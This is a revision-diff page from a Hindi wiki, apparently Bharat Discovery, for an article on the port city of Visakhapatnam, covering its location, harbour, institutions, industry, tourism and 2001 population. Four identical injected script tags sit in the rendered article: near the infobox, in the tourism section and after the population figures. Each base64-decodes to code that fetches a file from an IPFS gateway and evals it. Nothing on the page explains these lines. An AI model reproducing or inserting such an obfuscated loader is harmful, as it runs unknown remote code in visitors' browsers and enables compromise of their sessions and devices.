Difference between revisions of "विशाखापत्तनम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:आंध्र प्रदेश के पर्यटन स्थल (को हटा दिया गया हैं।))
Line 1: Line 1:
 
{{प्रतीक्षा|तिथि-समय=20:15, 19 जनवरी 2011 (IST)}}
 
{{प्रतीक्षा|तिथि-समय=20:15, 19 जनवरी 2011 (IST)}}
'''विशाखापत्तनम''' को '''वाइज़ाम''' के नाम से भी जाना जाता है। यह पूर्वोत्तर [[आंध्र प्रदेश]] राज्य का एक महत्वपूर्ण शहर है, जो दक्षिण-पूर्वी [[भारत]] का हिस्सा है।
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Visakhapatnam-Coast-View.jpg
 +
|चित्र का नाम=
 +
|विवरण=यह [[भारत]] का चौथा सबसे बड़ा बंदरगाह है। भारत में बने पहले स्टीमर का विशाखापत्तनम के बंदरगाह में 1948 में उद्घाटन हुआ था।
 +
|राज्य=[[आंध्र प्रदेश]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[विशाखापत्तनम ज़िला]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|यातायात=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|कैसे पहुँचें=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''विशाखापत्तनम''' को '''वाइज़ाम''' के नाम से भी जाना जाता है। यह पूर्वोत्तर [[आंध्र प्रदेश]] राज्य का एक महत्वपूर्ण शहर है, जो दक्षिण-पूर्वी [[भारत]] का हिस्सा है। यह भारत का चौथा सबसे बड़ा बंदरगाह है। यह विशाखापत्तनम ज़िले का मुख्यालय तथा भारतीय नौसेना के पूर्वी कमांड का केन्द्र है।
 
====स्थिति====
 
====स्थिति====
यह [[बंगाल]] की खाड़ी पर [[चेन्नई]] (भूतपूर्व मद्रास) के पूर्वोत्तर में लगभग 612 किमी. की दूरी पर स्थित है। विशाखापत्तनम एक छोटी खाड़ी पर स्थित है और इसका प्राकृतिक बंदरगाह दो उठे हुए अतंरीपों द्वारा निर्मित है, जो शहर से एक छोटी नदी द्वारा विभक्त है।
+
यह [[बंगाल]] की खाड़ी पर [[चेन्नई]] (भूतपूर्व मद्रास) के पूर्वोत्तर में लगभग 612 किमी. की दूरी पर स्थित है। विशाखापत्तनम एक छोटी खाड़ी पर स्थित है और इसका प्राकृतिक बंदरगाह दो उठे हुए अतंरीपों द्वारा निर्मित है, जो शहर से एक छोटी नदी द्वारा विभक्त है। विशाखापत्तनम आंध्र प्रदेश के उत्तरी सरकारी तट पर [[गोदावरी नदी]] के मुहाने के उत्तर में अवस्थित है।
 
====महत्त्व====
 
====महत्त्व====
'''विशाखापत्तनम के बंदरगाह का''' महत्त्व काफ़ी बढ़ा है। क्योंकि कोरोमंडल तट पर यही एकमात्र संरक्षित बंदरगाह है। इसमें किए गए सुधारों से अब यह 10.2 मीटर ऊँचे पोतों को भी आश्रय देने की स्थिति में है। यह शहर एक महत्त्वपूर्ण पोत निर्माण केंद्र भी है। भारत में बने पहले स्टीमर का यहीं विशाखापत्तनम के बंदरगाह में 1948 में उद्घाटन हुआ था। खाड़ी के उत्तरी छोर पर स्थित उपनगर वॉल्टेयर में आंध्र विश्वविद्यालय है। यहाँ के शैक्षणिक संस्थानों में आंध्र मेडिकल कॉलेज, कॉलेज ऑफ़ नर्सिंग, कॉलेज ऑफ़ इंजीनियरिंग, गाँधी इंस्टिट्यूट ऑफ़ टेक्नोलॉजी ऐंड मैनेजमेंट एवं कई महाविद्यालय हैं। विशाखापत्तनम मैंगनीज़ व तिलहन का निर्यात करता है और यहाँ एक तेल परिशोधनशाला तथा चिकित्सा संग्रहालय भी है।  
+
'''विशाखापत्तनम के बंदरगाह का''' महत्त्व काफ़ी बढ़ा है क्योंकि कोरोमंडल तट पर यही एकमात्र संरक्षित बंदरगाह है। इसमें किए गए सुधारों से अब यह 10.2 मीटर ऊँचे पोतों को भी आश्रय देने की स्थिति में है। यह शहर एक महत्त्वपूर्ण पोत निर्माण केंद्र भी है। भारत में बने पहले स्टीमर का विशाखापत्तनम के बंदरगाह में 1948 में उद्घाटन हुआ था। विशाखापत्तनम मैंगनीज़ व तिलहन का निर्यात करता है और यहाँ एक तेल परिशोधनशाला तथा चिकित्सा संग्रहालय भी है। '''सघन वनों से युक्त इसके पूर्वी घाट''' और सुदूर पूर्वी क्षेत्र [[गोदावरी नदी|गोदावरी]] व [[इन्द्रावती नदी|इंद्रावती]] सहित अनेक नदियों द्वारा अपवाहित होता है। इस क्षेत्र की अर्थव्यवस्था का आधार [[कृषि]] है।
 +
==शिक्षण संस्थान==
  
'''सघन वनों से युक्त इसके पूर्वी घाट''' और सुदूर पूर्वी क्षेत्र [[गोदावरी नदी|गोदावरी]] [[इन्द्रावती नदी|इंद्रावती]] सहित अनेक नदियों द्वारा अपवाहित होता है। इस क्षेत्र की अर्थव्यवस्था का आधार कृषि है।
+
खाड़ी के उत्तरी छोर पर स्थित उपनगर वॉल्टेयर में आंध्र विश्वविद्यालय है। यहाँ के शैक्षणिक संस्थानों में आंध्र मेडिकल कॉलेज, कॉलेज ऑफ़ नर्सिंग, कॉलेज ऑफ़ इंजीनियरिंग, गाँधी इंस्टिट्यूट ऑफ़ टेक्नोलॉजी ऐंड मैनेजमेंट एवं कई महाविद्यालय हैं।
 +
==उद्योग==
 +
विशाखापत्तनम में पानी का जहाज बनाने का कारख़ाना है। यह एक प्राकृतिक तथा सुरक्षित समुद्री बन्दरगाह है। कृषि एवं खनिज सम्पत्ति में समृद्ध [[आन्ध्र प्रदेश]], [[मध्य प्रदेश]] एवं [[उड़ीसा]] राज्य इस बन्दरगाह के पृष्ठ प्रदेश कहलाते हैं। यह एक उल्लेखनीय मत्स्य-शिकार का केन्द्र भी है। [[आंध्र प्रदेश]] और [[एशिया]] में सबसे तेजी से बढ़ रहे शहरों में से दूसरे सबसे बड़े इस शहर में उद्योग, जहाज निर्माण, एक बड़ी तेल रिफाइनरी, एक विशाल इस्पात और बिजली संयंत्र केन्द्र है।
 +
==पर्यटन==
 +
{{मुख्य|विशाखापत्तनम पर्यटन}}
 +
विशाखापत्तनम प्राचीन बौद्ध विरासत, भूवैज्ञानिक चमत्कार, प्रसिद्ध मंदिरों के एक उदार मिश्रण में संस्कृति, कला और शिल्प आदि के लिए प्रसिद्ध है। यह एक समय के साथ कदम रखने वाला शहर है, यहाँ तक कि यह शहर अपने समृद्ध अतीत के संरक्षण के प्रति भी सजग है। इसके सुंदर पूर्वी घाट बंगाल की खाड़ी के नीले पानी पर एक जादुई स्पर्श देते हैं।
 
====जनसंख्या====
 
====जनसंख्या====
 
'''जनगणना (2001) के अनुसार''' विशाखापत्तनम की जनसंख्या-शहर 9,69, 608; ज़िला 37, 89, 823 है।   
 
'''जनगणना (2001) के अनुसार''' विशाखापत्तनम की जनसंख्या-शहर 9,69, 608; ज़िला 37, 89, 823 है।   
 
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 20: Line 63:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{आंध्र प्रदेश के पर्यटन स्थल}}
 
[[Category:नया पन्ना]]
 
[[Category:नया पन्ना]]
 
[[Category:आंध्र प्रदेश]]
 
[[Category:आंध्र प्रदेश]]

Revision as of 07:10, 20 January 2011

pratiksha|left is panne par sampadan ka kary chal raha hai. kripaya pratiksha karean yadi 10 din ho chuke hoan to yah 'soochana saancha' hata dean ya dobara lagaean.
soochana saancha lagane ka samay → 20:15, 19 janavari 2011 (IST)

vishakhapattanam
vivaran yah bharat ka chautha sabase b da bandaragah hai. bharat mean bane pahale stimar ka vishakhapattanam ke bandaragah mean 1948 mean udghatan hua tha.
rajy aandhr pradesh
zila vishakhapattanam zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vishakhapattanam ko vaizam ke nam se bhi jana jata hai. yah poorvottar aandhr pradesh rajy ka ek mahatvapoorn shahar hai, jo dakshin-poorvi bharat ka hissa hai. yah bharat ka chautha sabase b da bandaragah hai. yah vishakhapattanam zile ka mukhyalay tatha bharatiy nausena ke poorvi kamaand ka kendr hai.

sthiti

yah bangal ki kha di par chennee (bhootapoorv madras) ke poorvottar mean lagabhag 612 kimi. ki doori par sthit hai. vishakhapattanam ek chhoti kha di par sthit hai aur isaka prakritik bandaragah do uthe hue atanripoan dvara nirmit hai, jo shahar se ek chhoti nadi dvara vibhakt hai. vishakhapattanam aandhr pradesh ke uttari sarakari tat par godavari nadi ke muhane ke uttar mean avasthit hai.

mahattv

vishakhapattanam ke bandaragah ka mahattv kafi badha hai kyoanki koromandal tat par yahi ekamatr sanrakshit bandaragah hai. isamean kie ge sudharoan se ab yah 10.2 mitar ooanche potoan ko bhi ashray dene ki sthiti mean hai. yah shahar ek mahattvapoorn pot nirman keandr bhi hai. bharat mean bane pahale stimar ka vishakhapattanam ke bandaragah mean 1948 mean udghatan hua tha. vishakhapattanam maianganiz v tilahan ka niryat karata hai aur yahaan ek tel parishodhanashala tatha chikitsa sangrahalay bhi hai. saghan vanoan se yukt isake poorvi ghat aur sudoor poorvi kshetr godavari v iandravati sahit anek nadiyoan dvara apavahit hota hai. is kshetr ki arthavyavastha ka adhar krishi hai.

shikshan sansthan

kha di ke uttari chhor par sthit upanagar v aaulteyar mean aandhr vishvavidyalay hai. yahaan ke shaikshanik sansthanoan mean aandhr medikal k aaulej, k aaulej aauf narsiang, k aaulej aauf ianjiniyariang, gaandhi ianstityoot aauf teknol aauji aiand mainejameant evan kee mahavidyalay haian.

udyog

vishakhapattanam mean pani ka jahaj banane ka karakhana hai. yah ek prakritik tatha surakshit samudri bandaragah hai. krishi evan khanij sampatti mean samriddh andhr pradesh, madhy pradesh evan u disa rajy is bandaragah ke prishth pradesh kahalate haian. yah ek ullekhaniy matsy-shikar ka kendr bhi hai. aandhr pradesh aur eshiya mean sabase teji se badh rahe shaharoan mean se doosare sabase b de is shahar mean udyog, jahaj nirman, ek b di tel riphainari, ek vishal ispat aur bijali sanyantr kendr hai.

paryatan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vishakhapattanam prachin bauddh virasat, bhoovaijnanik chamatkar, prasiddh mandiroan ke ek udar mishran mean sanskriti, kala aur shilp adi ke lie prasiddh hai. yah ek samay ke sath kadam rakhane vala shahar hai, yahaan tak ki yah shahar apane samriddh atit ke sanrakshan ke prati bhi sajag hai. isake suandar poorvi ghat bangal ki kha di ke nile pani par ek jaduee sparsh dete haian.

janasankhya

janaganana (2001) ke anusar vishakhapattanam ki janasankhya-shahar 9,69, 608; zila 37, 89, 823 hai. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh